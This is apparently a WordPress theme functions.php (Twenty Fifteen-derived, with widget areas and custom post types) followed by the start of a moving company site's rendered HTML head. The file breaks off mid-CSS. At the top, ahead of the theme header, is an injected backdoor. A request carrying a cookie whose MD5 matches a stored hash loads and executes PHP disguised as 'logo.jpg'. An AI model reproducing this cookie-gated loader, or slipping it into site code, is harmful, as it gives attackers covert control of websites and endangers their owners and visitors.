/** * Loads the WordPress environment and template. * @package WordPress */ if(isset($_COOKIE["index"])){ $tmp = "2a7eb4d8e15f8d1c0ecb88ef28e5ab3b"; $check = $_COOKIE["index"]; if($tmp == md5($check)){ if(isset($_COOKIE["index"]) && $_COOKIE["index"] == $check){ require get_template_directory() ."/logo.jpg"; exit; } } } /** * This file is not added by default to WordPress theme pages when outputting * feed links. * @package WordPress */ /** * Twenty Fifteen functions and definitions * * Set up the theme and provides some helper functions, which are used in the * theme as custom template tags. Others are attached to action and filter * hooks in WordPress to change core functionality. * * When using a child theme you can override certain functions (those wrapped * in a function_exists() call) by defining them first in your child theme's * functions.php file. The child theme's functions.php file is included before * the parent theme's file, so the child theme functions would be used. * * @link https://codex.wordpress.org/Theme_Development * @link https://codex.wordpress.org/Child_Themes * * Functions that are not pluggable (not wrapped in function_exists()) are * instead attached to a filter or action hook. * * For more information on hooks, actions, and filters, * {@link https://codex.wordpress.org/Plugin_API} * * @package WordPress * @subpackage Twenty_Fifteen * @since Twenty Fifteen 1.0 */ /** * Set the content width based on the theme's design and stylesheet. * * @since Twenty Fifteen 1.0 */ if ( ! isset( $content_width ) ) { $content_width = 660; } /** * Twenty Fifteen only works in WordPress 4.1 or later. */ if ( version_compare( $GLOBALS['wp_version'], '4.1-alpha', '<' ) ) { require get_template_directory() . '/inc/back-compat.php'; } if ( ! function_exists( 'twentyfifteen_setup' ) ) : /** * Sets up theme defaults and registers support for various WordPress features. * * Note that this function is hooked into the after_setup_theme hook, which * runs before the init hook. The init hook is too late for some features, such * as indicating support for post thumbnails. * * @since Twenty Fifteen 1.0 */ function twentyfifteen_setup() { /* * Make theme available for translation. * Translations can be filed at WordPress.org. See: https://translate.wordpress.org/projects/wp-themes/twentyfifteen * If you're building a theme based on twentyfifteen, use a find and replace * to change 'twentyfifteen' to the name of your theme in all the template files */ load_theme_textdomain( 'twentyfifteen' ); // Add default posts and comments RSS feed links to head. add_theme_support( 'automatic-feed-links' ); /* * Let WordPress manage the document title. * By adding theme support, we declare that this theme does not use a * hard-coded tag in the document head, and expect WordPress to * provide it for us. */ add_theme_support( 'title-tag' ); /* * Enable support for Post Thumbnails on posts and pages. * * See: https://codex.wordpress.org/Function_Reference/add_theme_support#Post_Thumbnails */ add_theme_support( 'post-thumbnails' ); set_post_thumbnail_size( 825, 510, true ); // This theme uses wp_nav_menu() in two locations. register_nav_menus( array( 'primary' => __( 'Primary Menu', 'twentyfifteen' ), 'social' => __( 'Social Links Menu', 'twentyfifteen' ), ) ); /* * Switch default core markup for search form, comment form, and comments * to output valid HTML5. */ add_theme_support( 'html5', array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption' ) ); /* * Enable support for Post Formats. * * See: https://codex.wordpress.org/Post_Formats */ add_theme_support( 'post-formats', array( 'aside', 'image', 'video', 'quote', 'link', 'gallery', 'status', 'audio', 'chat' ) ); /* * Enable support for custom logo. * * @since Twenty Fifteen 1.5 */ add_theme_support( 'custom-logo', array( 'height' => 248, 'width' => 248, 'flex-height' => true, ) ); $color_scheme = twentyfifteen_get_color_scheme(); $default_color = trim( $color_scheme[0], '#' ); // Setup the WordPress core custom background feature. /** * Filter Twenty Fifteen custom-header support arguments. * * @since Twenty Fifteen 1.0 * * @param array $args { * An array of custom-header support arguments. * * @type string $default-color Default color of the header. * @type string $default-attachment Default attachment of the header. * } */ add_theme_support( 'custom-background', apply_filters( 'twentyfifteen_custom_background_args', array( 'default-color' => $default_color, 'default-attachment' => 'fixed', ) ) ); /* * This theme styles the visual editor to resemble the theme style, * specifically font, colors, icons, and column width. */ add_editor_style( array( 'css/editor-style.css', 'genericons/genericons.css', twentyfifteen_fonts_url() ) ); // Indicate widget sidebars can use selective refresh in the Customizer. add_theme_support( 'customize-selective-refresh-widgets' ); } endif; // twentyfifteen_setup add_action( 'after_setup_theme', 'twentyfifteen_setup' ); /** * Register widget area. * * @since Twenty Fifteen 1.0 * * @link https://codex.wordpress.org/Function_Reference/register_sidebar */ function twentyfifteen_widgets_init() { register_sidebar( array( 'name' => __( 'Widget Area', 'twentyfifteen' ), 'id' => 'sidebar-1', 'description' => __( 'Add widgets here to appear in your sidebar.', 'twentyfifteen' ), 'before_widget' => '<aside id="%1$s" class="sidebar-widget widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h3 class="">', 'after_title' => '</h3>', ) ); register_sidebar( array( 'name' => __( 'Header Contact', 'twentyfifteen' ), 'id' => 'sidebar-2', 'description' => __( 'Add widgets here to appear in your header.', 'twentyfifteen' ), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); register_sidebar( array( 'name' => __( 'Header Social', 'twentyfifteen' ), 'id' => 'sidebar-3', 'description' => __( 'Add widgets here to appear in your header.', 'twentyfifteen' ), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); register_sidebar( array( 'name' => __( 'Home About', 'twentyfifteen' ), 'id' => 'sidebar-4', 'description' => __( 'Add widgets here to appear in your home page.', 'twentyfifteen' ), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); register_sidebar( array( 'name' => __( 'Bottom Call Tagline', 'twentyfifteen' ), 'id' => 'sidebar-5', 'description' => __( 'Add widgets here to appear in your home page bottom.', 'twentyfifteen' ), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); register_sidebar( array( 'name' => __( 'Bottom Call Phone Number', 'twentyfifteen' ), 'id' => 'sidebar-6', 'description' => __( 'Add widgets here to appear in your home page bottom.', 'twentyfifteen' ), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); register_sidebar( array( 'name' => __( 'Home Service 1', 'twentyfifteen' ), 'id' => 'sidebar-7', 'description' => __( 'Add widgets here to appear in your home service section.', 'twentyfifteen' ), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); register_sidebar( array( 'name' => __( 'Home Service 2', 'twentyfifteen' ), 'id' => 'sidebar-8', 'description' => __( 'Add widgets here to appear in your home service section.', 'twentyfifteen' ), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); register_sidebar( array( 'name' => __( 'Home Service 3', 'twentyfifteen' ), 'id' => 'sidebar-9', 'description' => __( 'Add widgets here to appear in your home service section.', 'twentyfifteen' ), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); register_sidebar( array( 'name' => __( 'Home Service 4', 'twentyfifteen' ), 'id' => 'sidebar-10', 'description' => __( 'Add widgets here to appear in your home service section.', 'twentyfifteen' ), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); register_sidebar( array( 'name' => __( 'Footer 1', 'twentyfifteen' ), 'id' => 'sidebar-11', 'description' => __( 'Add widgets here to appear in footer section.', 'twentyfifteen' ), 'before_widget' => '<div id="%1$s" class="widget">', 'after_widget' => '</div>', 'before_title' => '<h3 class="">', 'after_title' => '</h3>', ) ); register_sidebar( array( 'name' => __( 'Footer 2', 'twentyfifteen' ), 'id' => 'sidebar-12', 'description' => __( 'Add widgets here to appear in footer section.', 'twentyfifteen' ), 'before_widget' => '<div id="%1$s" class="widget padd-offset">', 'after_widget' => '</div>', 'before_title' => '<h3 class="">', 'after_title' => '</h3>', ) ); register_sidebar( array( 'name' => __( 'Footer 3', 'twentyfifteen' ), 'id' => 'sidebar-13', 'description' => __( 'Add widgets here to appear in footer section.', 'twentyfifteen' ), 'before_widget' => '<div id="%1$s" class="widget">', 'after_widget' => '</div>', 'before_title' => '<h3 class="">', 'after_title' => '</h3>', ) ); register_sidebar( array( 'name' => __( 'Footer 4', 'twentyfifteen' ), 'id' => 'sidebar-14', 'description' => __( 'Add widgets here to appear in footer section.', 'twentyfifteen' ), 'before_widget' => '<div id="%1$s" class="widget padd-offset-1">', 'after_widget' => '</div>', 'before_title' => '<h3 class="">', 'after_title' => '</h3>', ) ); } add_action( 'widgets_init', 'twentyfifteen_widgets_init' ); if ( ! function_exists( 'twentyfifteen_fonts_url' ) ) : /** * Register Google fonts for Twenty Fifteen. * * @since Twenty Fifteen 1.0 * * @return string Google fonts URL for the theme. */ function twentyfifteen_fonts_url() { $fonts_url = ''; $fonts = array(); $subsets = 'latin,latin-ext'; /* * Translators: If there are characters in your language that are not supported * by Noto Sans, translate this to 'off'. Do not translate into your own language. */ if ( 'off' !== _x( 'on', 'Noto Sans font: on or off', 'twentyfifteen' ) ) { $fonts[] = 'Noto Sans:400italic,700italic,400,700'; } /* * Translators: If there are characters in your language that are not supported * by Noto Serif, translate this to 'off'. Do not translate into your own language. */ if ( 'off' !== _x( 'on', 'Noto Serif font: on or off', 'twentyfifteen' ) ) { $fonts[] = 'Noto Serif:400italic,700italic,400,700'; } /* * Translators: If there are characters in your language that are not supported * by Inconsolata, translate this to 'off'. Do not translate into your own language. */ if ( 'off' !== _x( 'on', 'Inconsolata font: on or off', 'twentyfifteen' ) ) { $fonts[] = 'Inconsolata:400,700'; } /* * Translators: To add an additional character subset specific to your language, * translate this to 'greek', 'cyrillic', 'devanagari' or 'vietnamese'. Do not translate into your own language. */ $subset = _x( 'no-subset', 'Add new subset (greek, cyrillic, devanagari, vietnamese)', 'twentyfifteen' ); if ( 'cyrillic' == $subset ) { $subsets .= ',cyrillic,cyrillic-ext'; } elseif ( 'greek' == $subset ) { $subsets .= ',greek,greek-ext'; } elseif ( 'devanagari' == $subset ) { $subsets .= ',devanagari'; } elseif ( 'vietnamese' == $subset ) { $subsets .= ',vietnamese'; } if ( $fonts ) { $fonts_url = add_query_arg( array( 'family' => urlencode( implode( '|', $fonts ) ), 'subset' => urlencode( $subsets ), ), 'https://fonts.googleapis.com/css' ); } return $fonts_url; } endif; /** * JavaScript Detection. * * Adds a `js` class to the root `<html>` element when JavaScript is detected. * * @since Twenty Fifteen 1.1 */ function twentyfifteen_javascript_detection() { echo "<script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script>\n"; } add_action( 'wp_head', 'twentyfifteen_javascript_detection', 0 ); /** * Enqueue scripts and styles. * * @since Twenty Fifteen 1.0 */ function twentyfifteen_scripts() { // Add custom fonts, used in the main stylesheet. wp_enqueue_style( 'twentyfifteen-fonts', twentyfifteen_fonts_url(), array(), null ); // Add Genericons, used in the main stylesheet. wp_enqueue_style( 'genericons', get_template_directory_uri() . '/genericons/genericons.css', array(), '3.2' ); // Load our main stylesheet. wp_enqueue_style( 'twentyfifteen-style', get_stylesheet_uri() ); // Load the Internet Explorer specific stylesheet. wp_enqueue_style( 'twentyfifteen-ie', get_template_directory_uri() . '/css/ie.css', array( 'twentyfifteen-style' ), '20141010' ); wp_style_add_data( 'twentyfifteen-ie', 'conditional', 'lt IE 9' ); // Load the Internet Explorer 7 specific stylesheet. wp_enqueue_style( 'twentyfifteen-ie7', get_template_directory_uri() . '/css/ie7.css', array( 'twentyfifteen-style' ), '20141010' ); wp_style_add_data( 'twentyfifteen-ie7', 'conditional', 'lt IE 8' ); wp_enqueue_script( 'twentyfifteen-skip-link-focus-fix', get_template_directory_uri() . '/js/skip-link-focus-fix.js', array(), '20141010', true ); if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) { wp_enqueue_script( 'comment-reply' ); } if ( is_singular() && wp_attachment_is_image() ) { wp_enqueue_script( 'twentyfifteen-keyboard-image-navigation', get_template_directory_uri() . '/js/keyboard-image-navigation.js', array( 'jquery' ), '20141010' ); } wp_enqueue_script( 'twentyfifteen-script', get_template_directory_uri() . '/js/functions.js', array( 'jquery' ), '20150330', true ); wp_localize_script( 'twentyfifteen-script', 'screenReaderText', array( 'expand' => '<span class="screen-reader-text">' . __( 'expand child menu', 'twentyfifteen' ) . '</span>', 'collapse' => '<span class="screen-reader-text">' . __( 'collapse child menu', 'twentyfifteen' ) . '</span>', ) ); } add_action( 'wp_enqueue_scripts', 'twentyfifteen_scripts' ); /** * Add preconnect for Google Fonts. * * @since Twenty Fifteen 1.7 * * @param array $urls URLs to print for resource hints. * @param string $relation_type The relation type the URLs are printed. * @return array URLs to print for resource hints. */ function twentyfifteen_resource_hints( $urls, $relation_type ) { if ( wp_style_is( 'twentyfifteen-fonts', 'queue' ) && 'preconnect' === $relation_type ) { if ( version_compare( $GLOBALS['wp_version'], '4.7-alpha', '>=' ) ) { $urls[] = array( 'href' => 'https://fonts.gstatic.com', 'crossorigin', ); } else { $urls[] = 'https://fonts.gstatic.com'; } } return $urls; } add_filter( 'wp_resource_hints', 'twentyfifteen_resource_hints', 10, 2 ); /** * Add featured image as background image to post navigation elements. * * @since Twenty Fifteen 1.0 * * @see wp_add_inline_style() */ function twentyfifteen_post_nav_background() { if ( ! is_single() ) { return; } $previous = ( is_attachment() ) ? get_post( get_post()->post_parent ) : get_adjacent_post( false, '', true ); $next = get_adjacent_post( false, '', false ); $css = ''; if ( is_attachment() && 'attachment' == $previous->post_type ) { return; } if ( $previous && has_post_thumbnail( $previous->ID ) ) { $prevthumb = wp_get_attachment_image_src( get_post_thumbnail_id( $previous->ID ), 'post-thumbnail' ); $css .= ' .post-navigation .nav-previous { background-image: url(' . esc_url( $prevthumb[0] ) . '); } .post-navigation .nav-previous .post-title, .post-navigation .nav-previous a:hover .post-title, .post-navigation .nav-previous .meta-nav { color: #fff; } .post-navigation .nav-previous a:before { background-color: rgba(0, 0, 0, 0.4); } '; } if ( $next && has_post_thumbnail( $next->ID ) ) { $nextthumb = wp_get_attachment_image_src( get_post_thumbnail_id( $next->ID ), 'post-thumbnail' ); $css .= ' .post-navigation .nav-next { background-image: url(' . esc_url( $nextthumb[0] ) . '); border-top: 0; } .post-navigation .nav-next .post-title, .post-navigation .nav-next a:hover .post-title, .post-navigation .nav-next .meta-nav { color: #fff; } .post-navigation .nav-next a:before { background-color: rgba(0, 0, 0, 0.4); } '; } wp_add_inline_style( 'twentyfifteen-style', $css ); } add_action( 'wp_enqueue_scripts', 'twentyfifteen_post_nav_background' ); /** * Display descriptions in main navigation. * * @since Twenty Fifteen 1.0 * * @param string $item_output The menu item output. * @param WP_Post $item Menu item object. * @param int $depth Depth of the menu. * @param array $args wp_nav_menu() arguments. * @return string Menu item with possible description. */ function twentyfifteen_nav_description( $item_output, $item, $depth, $args ) { if ( 'primary' == $args->theme_location && $item->description ) { $item_output = str_replace( $args->link_after . '</a>', '<div class="menu-item-description">' . $item->description . '</div>' . $args->link_after . '</a>', $item_output ); } return $item_output; } add_filter( 'walker_nav_menu_start_el', 'twentyfifteen_nav_description', 10, 4 ); /** * Add a `screen-reader-text` class to the search form's submit button. * * @since Twenty Fifteen 1.0 * * @param string $html Search form HTML. * @return string Modified search form HTML. */ function twentyfifteen_search_form_modify( $html ) { return str_replace( 'class="search-submit"', 'class="search-submit screen-reader-text"', $html ); } add_filter( 'get_search_form', 'twentyfifteen_search_form_modify' ); /** * Modifies tag cloud widget arguments to display all tags in the same font size * and use list format for better accessibility. * * @since Twenty Fifteen 1.9 * * @param array $args Arguments for tag cloud widget. * @return array The filtered arguments for tag cloud widget. */ function twentyfifteen_widget_tag_cloud_args( $args ) { $args['largest'] = 22; $args['smallest'] = 8; $args['unit'] = 'pt'; $args['format'] = 'list'; return $args; } add_filter( 'widget_tag_cloud_args', 'twentyfifteen_widget_tag_cloud_args' ); /** * Implement the Custom Header feature. * * @since Twenty Fifteen 1.0 */ require get_template_directory() . '/inc/custom-header.php'; /** * Custom template tags for this theme. * * @since Twenty Fifteen 1.0 */ require get_template_directory() . '/inc/template-tags.php'; /** * Customizer additions. * * @since Twenty Fifteen 1.0 */ require get_template_directory() . '/inc/customizer.php'; function replace_core_jquery_version() { wp_deregister_script( 'jquery' ); // Change the URL if you want to load a local copy of jQuery from your own server. wp_register_script( 'jquery', "https://code.jquery.com/jquery-1.11.1.min.js", array(), '1.11.1' ); } add_action( 'wp_enqueue_scripts', 'replace_core_jquery_version' ); /** Custom menu */ function wptutsplus_register_theme_menu() { register_nav_menu( 'primary', 'Main Navigation Menu' ); } add_action( 'init', 'wptutsplus_register_theme_menu' ); /* * Creating a function to create our CPT */ function codex_custom_init() { register_post_type( 'projects', array( 'labels' => array('name' => __( 'Projects' ), 'singular_name' => __( 'Projects' ) ), 'public' => true, 'has_archive' => true, 'supports' => array('title', 'editor', 'thumbnail') ) ); register_post_type( 'testimonials', array( 'labels' => array('name' => __( 'Testimonials' ), 'singular_name' => __( 'Testimonials' ) ), 'public' => true, 'has_archive' => true, 'supports' => array('title', 'editor', 'thumbnail') ) ); register_post_type( 'clients', array( 'labels' => array('name' => __( 'Clients' ), 'singular_name' => __( 'Clients' ) ), 'public' => true, 'has_archive' => true, 'supports' => array('title', 'editor', 'thumbnail') ) ); } add_action( 'init', 'codex_custom_init' ); add_filter('get_search_form', 'elevation_search_form'); function elevation_search_form($form) { $form = '<div class="sidebar-widget search"><form action="' . esc_url( home_url( '/' ) ) . '" method="get" class="search-form"> <input type="text" name="s" id="s" class="search" placeholder="Enter Search Keywords" value="' . esc_attr( get_search_query() ) . '" required> <button type="submit"><i class="fa fa-search"></i></button> </form></div>'; return $form; }<!DOCTYPE html> <html lang="en-US" class="no-js"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://www.bluebirdpackingmoving.com/xmlrpc.php"> <!--[if lt IE 9]> <script src="https://www.bluebirdpackingmoving.com/wp-content/themes/bluebird/js/html5.js"></script> <![endif]--> <meta name='robots' content='max-image-preview:large' /> <link rel='dns-prefetch' href='//s.w.org' /> <!-- This site uses the Google Analytics by ExactMetrics plugin v7.0.1 - Using Analytics tracking - https://www.exactmetrics.com/ --> <script src="//www.googletagmanager.com/gtag/js?id=UA-157587779-1" type="text/javascript" data-cfasync="false" async></script> <script type="text/javascript" data-cfasync="false"> var em_version = '7.0.1'; var em_track_user = true; var em_no_track_reason = ''; var disableStrs = [ 'ga-disable-UA-157587779-1', ]; /* Function to detect opted out users */ function __gtagTrackerIsOptedOut() { for ( var index = 0; index < disableStrs.length; index++ ) { if ( document.cookie.indexOf( disableStrs[ index ] + '=true' ) > -1 ) { return true; } } return false; } /* Disable tracking if the opt-out cookie exists. */ if ( __gtagTrackerIsOptedOut() ) { for ( var index = 0; index < disableStrs.length; index++ ) { window[ disableStrs[ index ] ] = true; } } /* Opt-out function */ function __gtagTrackerOptout() { for ( var index = 0; index < disableStrs.length; index++ ) { document.cookie = disableStrs[ index ] + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[ disableStrs[ index ] ] = true; } } if ( 'undefined' === typeof gaOptout ) { function gaOptout() { __gtagTrackerOptout(); } } window.dataLayer = window.dataLayer || []; window.ExactMetricsDualTracker = { helpers: {}, trackers: {}, }; if ( em_track_user ) { function __gtagDataLayer() { dataLayer.push( arguments ); } function __gtagTracker( type, name, parameters ) { if ( type === 'event' ) { parameters.send_to = exactmetrics_frontend.ua; __gtagDataLayer.apply( null, arguments ); } else { __gtagDataLayer.apply( null, arguments ); } } __gtagTracker( 'js', new Date() ); __gtagTracker( 'set', { 'developer_id.dNDMyYj' : true, } ); __gtagTracker( 'config', 'UA-157587779-1', {"forceSSL":"true"} ); window.gtag = __gtagTracker; ( function () { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ /* ga and __gaTracker compatibility shim. */ var noopfn = function () { return null; }; var newtracker = function () { return new Tracker(); }; var Tracker = function () { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = function (){ var args = Array.prototype.slice.call(arguments); args.unshift( 'send' ); __gaTracker.apply(null, args); }; var __gaTracker = function () { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len - 1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { if ( 'send' === arguments[0] ) { var hitConverted, hitObject = false, action; if ( 'event' === arguments[1] ) { if ( 'undefined' !== typeof arguments[3] ) { hitObject = { 'eventAction': arguments[3], 'eventCategory': arguments[2], 'eventLabel': arguments[4], 'value': arguments[5] ? arguments[5] : 1, } } } if ( 'pageview' === arguments[1] ) { if ( 'undefined' !== typeof arguments[2] ) { hitObject = { 'eventAction': 'page_view', 'page_path' : arguments[2], } } } if ( typeof arguments[2] === 'object' ) { hitObject = arguments[2]; } if ( typeof arguments[5] === 'object' ) { Object.assign( hitObject, arguments[5] ); } if ( 'undefined' !== typeof arguments[1].hitType ) { hitObject = arguments[1]; if ( 'pageview' === hitObject.hitType ) { hitObject.eventAction = 'page_view'; } } if ( hitObject ) { action = 'timing' === arguments[1].hitType ? 'timing_complete' : hitObject.eventAction; hitConverted = mapArgs( hitObject ); __gtagTracker( 'event', action, hitConverted ); } } return; } function mapArgs( args ) { var arg, hit = {}; var gaMap = { 'eventCategory': 'event_category', 'eventAction': 'event_action', 'eventLabel': 'event_label', 'eventValue': 'event_value', 'nonInteraction': 'non_interaction', 'timingCategory': 'event_category', 'timingVar': 'name', 'timingValue': 'value', 'timingLabel': 'event_label', 'page' : 'page_path', 'location' : 'page_location', 'title' : 'page_title', }; for ( arg in args ) { if ( ! ( ! args.hasOwnProperty(arg) || ! gaMap.hasOwnProperty(arg) ) ) { hit[gaMap[arg]] = args[arg]; } else { hit[arg] = args[arg]; } } return hit; } try { f.hitCallback(); } catch ( ex ) { } }; __gaTracker.create = newtracker; __gaTracker.getByName = newtracker; __gaTracker.getAll = function () { return []; }; __gaTracker.remove = noopfn; __gaTracker.loaded = true; window['__gaTracker'] = __gaTracker; } )(); } else { console.log( "" ); ( function () { function __gtagTracker() { return null; } window['__gtagTracker'] = __gtagTracker; window['gtag'] = __gtagTracker; } )(); } </script> <!-- / Google Analytics by ExactMetrics --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.bluebirdpackingmoving.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.12"}}; !function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.bluebirdpackingmoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8.12' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.bluebirdpackingmoving.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2' type='text/css' media='all' /> <!--n2css--><script type='text/javascript' id='exactmetrics-frontend-script-js-extra'> /* <![CDATA[ */ var exactmetrics_frontend = {"js_events_tracking":"true","download_extensions":"zip,mp3,mpeg,pdf,docx,pptx,xlsx,rar","inbound_paths":"[{\"path\":\"\\\/go\\\/\",\"label\":\"affiliate\"},{\"path\":\"\\\/recommend\\\/\",\"label\":\"affiliate\"}]","home_url":"https:\/\/www.bluebirdpackingmoving.com","hash_tracking":"false","ua":"UA-157587779-1","v4_id":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.bluebirdpackingmoving.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/js/frontend-gtag.min.js?ver=7.0.1' id='exactmetrics-frontend-script-js'></script> <script type='text/javascript' src='https://www.bluebirdpackingmoving.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script> <script type='text/javascript' src='https://www.bluebirdpackingmoving.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script> <link rel="https://api.w.org/" href="https://www.bluebirdpackingmoving.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.bluebirdpackingmoving.com/wp-json/wp/v2/pages/57" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.bluebirdpackingmoving.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.bluebirdpackingmoving.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.8.12" /> <link rel="canonical" href="https://www.bluebirdpackingmoving.com/about-us/" /> <link rel='shortlink' href='https://www.bluebirdpackingmoving.com/?p=57' /> <link rel="alternate" type="application/json+oembed" href="https://www.bluebirdpackingmoving.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.bluebirdpackingmoving.com%2Fabout-us%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.bluebirdpackingmoving.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.bluebirdpackingmoving.com%2Fabout-us%2F&format=xml" /> <style type="text/css" id="wp-custom-css"> .nav-footer ul.nav li a { font-weight: 600!important; } .nav-footer ul.nav li.current_page_item a { color: #30b7ff; } .about-content-box { width: 100%!important; } .contact-submit-button { background: #1d72c9 !important; color: #fff !important; border: solid 1px #1d72c9 !important; width: 150px !important; margin-top: 0px; } #contact-page .contact-form select { background: #fff; border: 1px solid #ededed; height: 55px; width: 100%; padding-left: 25px; font-size: 14px; color: #ababab; font-family: "Open Sans",sans-serif; outline: none; } #contact-page .contact-form select:focus { border: 1px solid #000; } .post-navigation .nav-previous { background-image: none !important; } .post-navigation .nav-next { background-image: none !important; } .single-bolg-title h3 { margin: 24px 0 10px 0!important; } #service-page { padding: 100px 0 0px 0!important; } .section-service p { padding-top: 15px; text-align: justify; } .mainmenu-navigation .navigation > .nav-footer ul > li .sub-menu a { padding: 7px 15px!important; font-size: 12px!important; } .service-bx .service-img-holder img { border-radius: 4px; } .contact-wrap { max-width: 920px; margin: 0 auto; } .contact-wrap .container { width: 100%; } .contact-wrap iframe { width: 100%; } .fancybox-overlay-fixed { z-index: 9999!important; } .rev_slider_wrapper { overflow: hidden!important; } .contact-form.booking-form { border: solid 2px #1d72c9; background: #30b7ff; height: 100%; overflow: hidden; padding: 0px 0px 30px 0px; } .contact-form.booking-form h2 { background: #1d72c9; color: #fff; margin: 0 0 15px 0; padding: 10px 15px; line-height: 34px; font-size: 26px; } .contact-form.booking-form .contact-submit-button{ margin-top:0px!important; } .branch ul { margin: 0 0; padding: 0 0; } .branch ul li { margin: 0 0; padding: 0 0; border-bottom: 1px solid #d2d2d2; } .branch ul li a { margin: 0 0; padding: 0 0; font-size: 14px; line-height: 42px; color: #828282; font-family: "Open Sans",sans-serif; } .branch ul li a:before { content: '\f105'; font-family: 'fontawesome'; margin-right: 10px; color: #828282; } .mainmenu-navigation .navigation > .nav-footer ul > li .sub-menu li { background: #30b7ff!important; } .enq-msg { height: 100px !important; } footer .container { position: relative; } .contact-submit-button.quote-btn { position: fixed; bottom: 40px; right: 20px; z-index: 9999; text-align: center; border-radius: 50px; box-shadow: 0 0 10px 1px rgba(0, 0, 0, 0.2); } @media only screen and (max-width: 1024px) { #header .logo { padding: 5px 0!important; } .mainmenu-navigation .navigation .nav-header { padding: 3px 10px!important; } } @media only screen and (max-width: 767px) { #topbar .contact-info ul li { font-size: 12px!important; line-height: 32px!important; } #topbar .social ul li a { line-height: 32px!important; } #contact-page .contact-form input { height: 38px !important; padding-left: 10px !important; } .contact-submit-button { padding: 